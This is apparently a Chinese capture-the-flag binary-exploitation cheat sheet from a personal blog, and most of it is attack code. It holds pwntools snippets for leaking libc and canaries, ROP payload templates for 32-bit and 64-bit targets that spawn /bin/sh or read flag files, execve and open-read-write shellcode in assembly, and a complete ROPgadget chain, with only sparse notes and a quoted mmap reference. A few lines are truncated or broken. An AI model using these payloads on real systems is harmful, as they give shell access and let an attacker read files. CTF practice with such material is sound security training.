ldd filename 读取libc
ROPgadget --binary filename --only "pop|ret"
__libc_start_main = u64(sh.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
__libc_start_main = u32(sh.recvuntil("\xf7")[-4:])
__libc_start_main = u32(sh.recv(4))
canary = u64(sh.recv(7).rjust(8,"\x00")) log.success("canary------>" + hex(canary))
接受成int型地址:str_addr = int(sh.recvuntil("\n",True),16)
seccomp-tools dump ./filename
找不到flag:grep -rn flag *
32位
第一个放在rdi 第二个放在rsi 第三个放在rdx
64位就得
32位
payload += p32(printf_plt)
payload += p32(start_vuln)
payload += p32(0x080486F8)
payload += p32(elf.got['__libc_start_main'])
system("/bin/sh")
payload += p32(system)
payload += p32(0)
payload += p32(binsh)
sh.sendline(payload)
write
payload += p32(elf.plt['write'])
payload += p32(pop_esi_edi_ebp_ret)
payload += p32(1)
payload += p32(elf.got['__libc_start_main'])
payload += p32(4)
payload += p32(start_main)
read
payload += p32(elf.plt['read'])
payload += p32(pop3_ret)
payload += p32(0) #从哪里读取
payload += p32(bss_addr)
payload += p32(0x223) #长度
64
main_arena = u64(io.recv(6).ljust(8,'\x00'))-88
log.success('main arena: '+hex(main_arena))
libc_base = main_arena - 0x3c4b20
log.success('libc base: '+hex(libc_base))2.
libc_base = u64(sh.recv(8)) - 0x3C4B78
malloc_hook = libc_base + libc.symbols['__malloc_hook']
log.success("libc_base: " + hex(libc_base))
log.success("__malloc_hook: " + hex(malloc_hook))
system
payload += p64(pop_rdi_ret)
payload += p64(binsh)
payload += p64(system)
sh.sendline(payload)
printf
payload += p64(pop_rdi_ret)
payload += p64(elf.got['__libc_start_main'])
payload += p64(elf.plt['printf'])
payload += p64(start_main)
write
payload += p64(pop_rdi_ret)
payload += p64(1)
payload += p64(pop_rsi_r15_ret)
payload += p64(elf.got['__libc_start_main'])
payload += p64(1)
payload += p64(elf.plt['write'])
payload += p64(start_main)
32
read
payload =p32(elf.plt['read'])
payload += p32(pop3_ret)
payload += p32(0)
payload += p32(base)
payload += p32(0x500)
write
payload += p32(elf.plt['write'])
payload += p32(pop3_ret)
payload += p32(1)
payload += p32(elf.got['__libc_start_main'])
payload += p32(4)
payload += p32(start_main)
64
puts
payload += p64(pop_rdi_ret)
payload += p64(elf.got['__libc_start_main'])
payload += p64(elf.plt['puts'])
system("/bin/sh")
payload += p64(pop_rdi_ret)
payload += p64(binsh)
payload += p64(system)
sh.sendline(payload)
read
payload += p64(pop_rsi_ret)
payload += p64(elf.bss())
payload += p64(elf.plt['read'])
open
payload += p64(pop_rdi_ret)
payload += p64(elf.bss()+0x100)
payload += p64(pop_rsi_ret)
payload += p64(0)
payload += p64(elf.plt['open'])
open_read_put
payload += p64(pop_rsi_ret)
payload += p64(elf.bss()+0x100)
payload += p64(elf.plt['read'])
payload += p64(pop_rdi_ret)
payload += p64(elf.bss()+0x100)
payload += p64(pop_rsi_ret)
payload += p64(0)
payload += p64(elf.plt['open'])
payload += p64(pop_rdi_ret)
payload += p64(4)#?
payload += p64(pop_rsi_ret)
payload += p64(elf.bss()+0x100)
payload += p64(elf.plt['read'])
payload += p64(pop_rdi_ret)
payload += p64(elf.bss()+0x100)
payload += p64(elf.plt['puts'])
i386
可参考http://mrbelieve.tech/2020/01/24/ciscn_2019_s_9/
shellcode ='''
xor eax,eax
push eax
push 0x68732f2f #//sh
push 0x6e69622f # /bin
mov ebx,esp
mov ecx,eax
mov edx,eax
mov al,0xb
int 0x80
xor eax,eax
inc eax
int 0x80
'''
shellcode =asm(shellcode) #使用shellcraft.sh打不通,估计是因为太长了
shell="sub esp,0x28;call esp"
shell =asm(shell)
amd64
push 0x67616c66
mov rdi,rsp
push 2
pop rax
xor rsi,rsi
push 32
pop rdx
syscall
mov rdi,rax
mov rsi,rsp
xor rax,rax
syscall
push 1
pop rdi
push 1
pop rax
syscall
push 0x42
pop rax
inc ah
cqo
push rdx
movabs rdi, 0x68732f2f6e69622f
push rdi
push rsp
pop rsi
mov r8, rdx
mov r10, rdx
syscal
xor %rsi,%rsi
push %rsi
mov $0x68732f2f6e69622f,%rdi
push %rdi
push %rsp
pop %rdi
push $0x3b
pop %rax
cltd
syscall
mmap
void *mmap(void *start,size_t length,int prot,int flags,int fd,off_t offsize);
参数start:指向欲映射的内存起始地址,通常设为 NULL,代表让系统自动选定地址,映射成功后返回该地址。
参数length:代表将文件中多大的部分映射到内存。
参数prot:映射区域的保护方式。可以为以下几种方式的组合: PROT_EXEC 映射区域可被执行 PROT_READ 映射区域可被读取 PROT_WRITE 映射区域可被写入 PROT_NONE 映射区域不能存取
参数flags:影响映射区域的各种特性。在调用mmap()时必须要指定MAP_SHARED 或MAP_PRIVATE。 MAP_FIXED 如果参数start所指的地址无法成功建立映射时,则放弃映射,不对地址做修正。通常不鼓励用此旗标。 MAP_SHARED 对映射区域的写入数据会复制回文件内,而且允许其他映射该文件的进程共享。 MAP_PRIVATE 对映射区域的写入操作会产生一个映射文件的复制,即私人的“写入时复制”(copy on write)对此区域作的任何修改都不会写回原来的文件内容。 MAP_ANONYMOUS 建立匿名映射。此时会忽略参数fd,不涉及文件,而且映射区域无法和其他进程共享。 MAP_DENYWRITE 只允许对映射区域的写入操作,其他对文件直接写入的操作将会被拒绝。 MAP_LOCKED 将映射区域锁定住,这表示该区域不会被置换(swap)。
参数fd:要映射到内存中的文件描述符。如果使用匿名内存映射时,即flags中设置了MAP_ANONYMOUS,fd设为-1。有些系统不支持匿名内存映射,则可以使用fopen打开/dev/zero文件,然后对该文件进行映射,可以同样达到匿名内存映射的效果。
参数offset:文件映射的偏移量,通常设置为0,代表从文件最前方开始对应,offset必须是分页大小的整数倍。 ———————————————— 版权声明:本文为CSDN博主「为幸福写歌」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/yzy1103203312/article/details/78286360
from struct import pack
p = lambda x : pack('I', x)
IMAGE_BASE_0 = 0x08048000 # ./simplerop
rebase_0 = lambda x : p(x + IMAGE_BASE_0)
rop = ''
rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret;
rop += '/bin'
rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret;
rop += rebase_0(0x000a3060)
rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret;
rop += '/sh\x00'
rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret;
rop += rebase_0(0x000a3064)
rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret;
rop += pack('I', pop_edx_ecx_ebx)
rop += p(0)
rop += p(0)
rop += rebase_0(0x000a3060)
rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret;
rop += p(0x0000000b)
rop += rebase_0(0x00026ef0) # 0x0806eef0: int 0x80; ret;
「真诚赞赏,手留余香」
Mr.Be1ieVe's Treasure
真诚赞赏,手留余香
使用微信扫描二维码完成支付
